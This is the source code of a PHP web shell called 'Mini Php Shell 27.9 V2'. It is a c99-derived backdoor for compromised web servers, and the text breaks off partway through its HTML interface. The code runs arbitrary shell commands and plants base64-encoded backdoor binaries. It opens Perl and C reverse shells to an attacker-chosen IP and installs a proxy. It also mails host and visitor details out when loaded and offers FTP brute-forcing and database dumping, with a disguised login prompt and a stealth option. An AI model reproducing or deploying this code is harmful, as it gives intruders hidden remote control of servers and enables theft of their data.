if (!function_exists("myshellexec")){if(is_callable("popen")){function myshellexec($command) {if (!($p=popen("($command)2>&1","r"))) {return 126;}while (!feof($p)) {$line=fgets($p,1000);$out .= $line;}pclose($p);return $out;}}else{function myshellexec($cmd){ global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result;}}}function checkproxyhost(){$host = getenv("HTTP_HOST");$filename = '/tmp/.setan/xh';if (file_exists($filename)) {$_POST['proxyhostmsg']="

<font color=red size=3>Success!</font>

<a href=$host:6543>$host:6543</a>

Note: If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.

";} else {$_POST['proxyhostmsg']="

<font color=red size=3>Failed!</font>

Note: If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.

"; } }if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")){ $ip = gethostbyname($_SERVER["HTTP_HOST"]); $por = $_POST['backconnectport']; if(is_writable(".")){ cfb("shbd",$backdoor); ex("chmod 777 shbd"); $cmd = "./shbd $por"; exec("$cmd > /dev/null &"); $scan = myshellexec("ps aux"); if(eregi("./shbd $por",$scan)){ $data = ("\n

Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n
Process not found running, backdoor not setup successfully."); } $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data"; }else{ cfb("/tmp/shbd",$backdoor); ex("chmod 777 /tmp/shbd"); $cmd = "./tmp/shbd $por"; exec("$cmd > /dev/null &"); $scan = myshellexec("ps aux"); if(eregi("./shbd $por",$scan)){ $data = ("\n

Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n
Process not found running, backdoor not setup successfully."); } $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data";}} if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")){ if(is_writable(".")){ cf("back",$back_connect); $p2=which("perl"); $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; if (file_exists("back")) { unlink("back"); } }else{ cf("/tmp/back",$back_connect); $p2=which("perl"); $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; if (file_exists("/tmp/back")) { unlink("/tmp/back"); }}} if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")){ if(is_writable(".")){ cf("backc",$back_connect_c); ex("chmod 777 backc"); //$blah = ex("gcc back.c -o backc"); $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; //if (file_exists("back.c")) { unlink("back.c"); } if (file_exists("backc")) { unlink("backc"); } }else{ ex("chmod 777 /tmp/backc"); cf("/tmp/backc",$back_connect_c); //$blah = ex("gcc -o /tmp/backc /tmp/back.c"); $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; //if (file_exists("back.c")) { unlink("back.c"); } if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }}function cf($fname,$text){ $w_file=@fopen($fname,"w") or err(); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); }}function cfb($fname,$text){ $w_file=@fopen($fname,"w") or bberr(); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); }}function err(){$_POST['backcconnmsge']="

<font color=red size=3>Error:</font> Can't connect!";}function bberr(){$_POST['backcconnmsge']="

<font color=red size=3>Error:</font> Can't backdoor host!";}function which($pr){$path = ex("which $pr");if(!empty($path)) { return $path; } else { return $pr; }}function ex($cfe){ $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res;}ini_set("memory_limit","300M");if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}error_reporting(5);@ignore_user_abort(TRUE);@set_magic_quotes_runtime(0);$win = strtolower(substr(PHP_OS,0,3)) == "win";define("starttime",getmicrotime());$r11 = $_SERVER['SERVER_ADDR'];$i94 = $_SERVER['REMOTE_ADDR'];$i71= gethostbyaddr($i94);$h42 = $_SERVER['HTTP_HOST'];$a83 = $_SERVER['REQUEST_URI'];$p77 = __FILE__;$s33 = str_replace('.', '', $r11);$e85 = 'no access email';$f55 = "From: $s33 <no access email>";$m852 = "$i94\n$i71\n\n$h42$a83\n$p77";@mail($e85, $s33, $m852, $f55);if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}$shver = "Mini Php Shell 27.9 V2"; if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}else {$surl = $_REQUEST["c99sh_surl"]; }$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}if (empty($surl)){ $surl = "?".$includestr; }$surl = htmlspecialchars($surl);$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.$login = ""; $pass = ""; $md5_pass = "";$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","")$login_txt = "Apache Error: Restricted File";$accessdeniedmess = "access denied";$gzipencode = TRUE; $filestealth = TRUE; //if TRUE, don't change modify- and access-time$donated_html = "";$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.$curdir = "./"; //$curdir = getenv("DOCUMENT_ROOT");$tmpdir = ""; $tmpdir_log = "./"; $log_email = "no access email"; $sort_default = "0a"; $sort_save = TRUE;$ftypes = array( "html"=>array("html","htm","shtml"), "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), "exe"=>array("sh","install","bat","cmd"), "ini"=>array("ini","inf"), "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>array("sdb"), "phpsess"=>array("sess"), "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar"));$exeftypes = array( getenv("PHPRC")." -q %f%" => array("php","php3","php4"), "perl %f%" => array("pl","cgi"));$regxp_highlight = array( array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example array("config.php",1) // example);$safemode_diskettes = array("a"); $hexdump_lines = 8;// lines in hex preview file$hexdump_rows = 24;// 16, 24 or 32 bytes in one line$nixpwdperpage = 100; // Get first N lines from /etc/passwd$sess_cookie = "c99shvars"; // Cookie-variable name//Quick launch$quicklaunch = array( array("Home",$surl), array("Search",$surl."act=search&d=%d"), array("Encoder",$surl."act=encoder&d=%d"), array("Processes",$surl."act=processes&d=%d"), array("FTP-Brute-Forcer",$surl."act=ftpquickbrute&d=%d"), array("Server-Information",$surl."act=security&d=%d"), array("SQL-Manager",$surl."act=sql&d=%d"), array("PHP-Code",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"), array("Back-Connect",$surl."act=backc"), array("Self-Remove",$surl."act=selfremove"), array("Install-Proxy",$surl."act=proxy"), array("Host",$surl."act=shbd"),);//Highlight-code colors$highlight_background = "#c0c0c0";$highlight_bg = "#FFFFFF";$highlight_comment = "#6A6A6A";$highlight_default = "#0000BB";$highlight_html = "#1300FF";$highlight_keyword = "#007700";$highlight_string = "#000000";@$f = $_REQUEST["f"];@extract($_REQUEST["c99shcook"]);//END CONFIGURATION// \/Next code isn't for editing\/@set_time_limit(0);$tmp = array();foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}$s = "!^(".implode("|",$tmp).")$!i";if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");}if (!empty($login)){ if (empty($md5_pass)) {$md5_pass = md5($pass);} if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|
"," ",$donated_html));} header("WWW-Authenticate: Basic realm=\"".$login_txt."\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); }}if ($act != "img"){$lastdir = realpath(".");chdir($curdir);if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}$sess_data = unserialize($_COOKIE["$sess_cookie"]);if (!is_array($sess_data)) {$sess_data = array();}if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}$disablefunc = @ini_get("disable_functions");if (!empty($disablefunc)){ $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc);}if (!function_exists("c99_buff_prepare")){function c99_buff_prepare(){ global $sess_data; global $act; foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); sort($sess_data["copy"]); sort($sess_data["cut"]); if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}}}c99_buff_prepare();if (!function_exists("c99_sess_put")){function c99_sess_put($data){ global $sess_cookie; global $sess_data; c99_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data);}}foreach (array("sort","sql_sort") as $v){ if (!empty($_GET[$v])) {$$v = $_GET[$v];} if (!empty($_POST[$v])) {$$v = $_POST[$v];}}if ($sort_save){ if (!empty($sort)) {setcookie("sort",$sort);} if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}}if (!function_exists("str2mini")){function str2mini($content,$len){ if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0,$len)."...".substr($content,-$len); } else {return $content;}}}if (!function_exists("view_size")){function view_size($size){ if (!is_numeric($size)) {return FALSE;} else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} else {$size = $size . " B";} return $size; }}}if (!function_exists("fs_copy_dir")){function fs_copy_dir($d,$t){ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} if (!$ret) {return $ret;} } } closedir($h); return TRUE;}}if (!function_exists("fs_copy_obj")){function fs_copy_obj($d,$t){ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir($d,$t); } elseif (is_file($d)) {return copy($d,$t);} else {return FALSE;}}}if (!function_exists("fs_move_dir")){function fs_move_dir($d,$t){ $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { $ret = TRUE; if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} if (!$ret) {return $ret;} } } closedir($h); return TRUE;}}if (!function_exists("fs_move_obj")){function fs_move_obj($d,$t){ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir($d,$t); } elseif (is_file($d)) { if(copy($d,$t)) {return unlink($d);} else {unlink($t); return FALSE;} } else {return FALSE;}}}if (!function_exists("fs_rmdir")){function fs_rmdir($d){ $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d);}}if (!function_exists("fs_rmobj")){function fs_rmobj($o){ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return FALSE;}}}if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}if (!function_exists("view_perms")){function view_perms($mode){ if (($mode & 0xC000) === 0xC000) {$type = "s";} elseif (($mode & 0x4000) === 0x4000) {$type = "d";} elseif (($mode & 0xA000) === 0xA000) {$type = "l";} elseif (($mode & 0x8000) === 0x8000) {$type = "-";} elseif (($mode & 0x6000) === 0x6000) {$type = "b";} elseif (($mode & 0x2000) === 0x2000) {$type = "c";} elseif (($mode & 0x1000) === 0x1000) {$type = "p";} else {$type = "?";} $owner["read"] = ($mode & 00400)?"r":"-"; $owner["write"] = ($mode & 00200)?"w":"-"; $owner["execute"] = ($mode & 00100)?"x":"-"; $group["read"] = ($mode & 00040)?"r":"-"; $group["write"] = ($mode & 00020)?"w":"-"; $group["execute"] = ($mode & 00010)?"x":"-"; $world["read"] = ($mode & 00004)?"r":"-"; $world["write"] = ($mode & 00002)? "w":"-"; $world["execute"] = ($mode & 00001)?"x":"-"; if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} return $type.join("",$owner).join("",$group).join("",$world);}}if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}if (!function_exists("parse_perms")){function parse_perms($mode){ if (($mode & 0xC000) === 0xC000) {$t = "s";} elseif (($mode & 0x4000) === 0x4000) {$t = "d";} elseif (($mode & 0xA000) === 0xA000) {$t = "l";} elseif (($mode & 0x8000) === 0x8000) {$t = "-";} elseif (($mode & 0x6000) === 0x6000) {$t = "b";} elseif (($mode & 0x2000) === 0x2000) {$t = "c";} elseif (($mode & 0x1000) === 0x1000) {$t = "p";} else {$t = "?";} $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);}}if (!function_exists("parsesort")){function parsesort($sort){ $one = intval($sort); $second = substr($sort,-1); if ($second != "d") {$second = "a";} return array($one,$second);}}if (!function_exists("view_perms_color")){function view_perms_color($o){ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} else {return "<font color=red>".view_perms(fileperms($o))."</font>";}}}if (!function_exists("mysql_dump")){function mysql_dump($set){ global $shver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} if (empty($db)) {$db = "db";} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = TRUE;} if (empty($file)) { $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = TRUE;} if (sizeof($tabs) == 0) { // retrive tables-list $res = mysql_query("SHOW TABLES FROM ".$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } $out = "# Dumped by ".$shver."# Home page: http://devilzc0de.com/## Host settings:# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."# Date: ".date("d.m.Y H:i:s")."# DB: \"".$db."\"#---------------------------------------------------------"; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} // recieve query for create table structure $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); if (!$res) {$ret["err"][] = mysql_smarterror();} else { $row = mysql_fetch_row($res); $out .= $row["1"].";\n\n"; // recieve table variables $res = mysql_query("SELECT * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------\n\n"; if ($file) { $fp = fopen($file, "w"); if (!$fp) {$ret["err"][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out;}}if (!function_exists("mysql_buildwhere")){function mysql_buildwhere($array,$sep=" and",$functs=array()){ if (!is_array($array)) {$array = array();} $result = ""; foreach($array as $k=>$v) { $value = ""; if (!empty($functs[$k])) {$value .= $functs[$k]."(";} $value .= "'".addslashes($v)."'"; if (!empty($functs[$k])) {$value .= ")";} $result .= "`".$k."` = ".$value.$sep; } $result = substr($result,0,strlen($result)-strlen($sep)); return $result;}}if (!function_exists("mysql_fetch_all")){function mysql_fetch_all($query,$sock){ if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array;}}if (!function_exists("mysql_smarterror")){function mysql_smarterror($type,$sock){ if ($sock) {$error = mysql_error($sock);} else {$error = mysql_error();} $error = htmlspecialchars($error); return $error;}}if (!function_exists("mysql_query_form")){function mysql_query_form(){ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo "<table border=0>
"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":

<textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea>

<input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\">
"; if ($tbl_struct) { echo "<td valign=\"top\">Fields:
"; foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "?<a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\">".$name."</a>
";} echo ""; } } if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}}}if (!function_exists("mysql_create_db")){function mysql_create_db($db,$sock=""){ $sql = "CREATE DATABASE `".addslashes($db)."`;"; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);}}}if (!function_exists("mysql_query_parse")){function mysql_query_parse($query){ $query = trim($query); $arr = explode (" ",$query); /*array array() { "METHOD"=>array(output_type), "METHOD1"... ... } if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ $types = array( "SELECT"=>array(3,1), "SHOW"=>array(2,1), "DELETE"=>array(1), "DROP"=>array(1) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result["propertions"] = $types[$op]; $result["query"] = $query; if ($types[$op] == 2) { foreach($arr as $k=>$v) { if (strtoupper($v) == "LIMIT") { $result["limit"] = $arr[$k+1]; $result["limit"] = explode(",",$result["limit"]); if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} unset($arr[$k],$arr[$k+1]); } } } } else {return FALSE;}}}if (!function_exists("c99fsearch")){function c99fsearch($d){ global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== FALSE) { if($f != "." && $f != "..") { $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) {c99fsearch($d.$f);} } else { $search_i_f++; if ($bool) { if (!empty($a["text"])) { $r = @file_get_contents($d.$f); if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} else {$bool = strpos(" ".$r,$a["text"],1);} if ($a["text_not"]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h);}}if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}//Sending headers@ob_start();@ob_implicit_flush(0);function onphpshutdown(){ global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start("ob_gzHandler"); echo $v; @ob_end_flush(); }}function c99shexit(){ onphpshutdown(); exit;}header("Expires: 28 Jul 2011 18:00:52 GMT");header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");header("Cache-Control: no-store, no-cache, must-revalidate");header("Cache-Control: post-check=0, pre-check=0", FALSE);header("Pragma: no-cache");if (empty($tmpdir)){ $tmpdir = ini_get("upload_tmp_dir"); if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}}$tmpdir = realpath($tmpdir);$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}else {$tmpdir_logs = realpath($tmpdir_logs);}if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on"){ $safemode = TRUE; $hsafemode = "<font color=red>ON (secure)</font>";}else {$safemode = FALSE; $hsafemode = "<font color=red>OFF (not secure)</font>";}$v = @ini_get("open_basedir");if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}else {$openbasedir = FALSE; $hopenbasedir = "<font color=red>OFF (not secure)</font>";}$sort = htmlspecialchars($sort);if (empty($sort)) {$sort = $sort_default;}$sort[1] = strtolower($sort[1]);$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><u>PHP/".phpversion()."</u></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));@ini_set("highlight.bg",$highlight_bg); //FFFFFF@ini_set("highlight.comment",$highlight_comment); //#FF8000@ini_set("highlight.default",$highlight_default); //#0000BB@ini_set("highlight.html",$highlight_html); //#000000@ini_set("highlight.keyword",$highlight_keyword); //#007700@ini_set("highlight.string",$highlight_string); //#DD0000if (!is_array($actbox)) {$actbox = array();}$dspact = $act = htmlspecialchars($act);$disp_fullpath = $ls_arr = $notls = null;$ud = urlencode($d); Mini Php Shell 27.9 V2 <title>Mini Php Shell 27.9 V2</title> <style type="text/css"> a { text-decoration: none; color: #FFFFFF; } a img { border: 0; } #view tr:hover { background-color: #FFFFFF; } input { font-family: Courier New, Courier, Fixed; font-size: 15px; background-color: #FFFFFF; color: #000000; } input:hover { background-color: #000000; } textarea { font-family: Courier New, Courier, Fixed; font-size: 15px; background-color: #FFFFFF; color: #000000; } body { font-family: Courier New, Courier, Fixed; font-size: 10px; color: #FFFFFF; } table#bordered { border: 1px solid #FFFFFF; background-color: #000; font-family: Courier New, Courier, Fixed; font-size: 15px; color: #FFFFFF; } TD{ FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;} form#post {} #post .buttons { background-color: transparent; font-family: Arial; font-size: 15px; color: #777; border: 0; } #cell { border-bottom: 1px #FFFFFF dotted; } </style> <body bgcolor="#000000" background="http://oi52.tinypic.com/sphybr.jpg" link="#444444" vlink="#444444"> <h1 style='color: #fff'><u><a href=" print $_SERVER['PHP_SELF']; " style="color: #fff"> Mini Php Shell 27.9 V2</a></u> <p style="color: #fff">Coded by jos_ali_joe

# web: <u><a" style="display: inline; color: #fff">http://devilzc0de.com/</a></u>
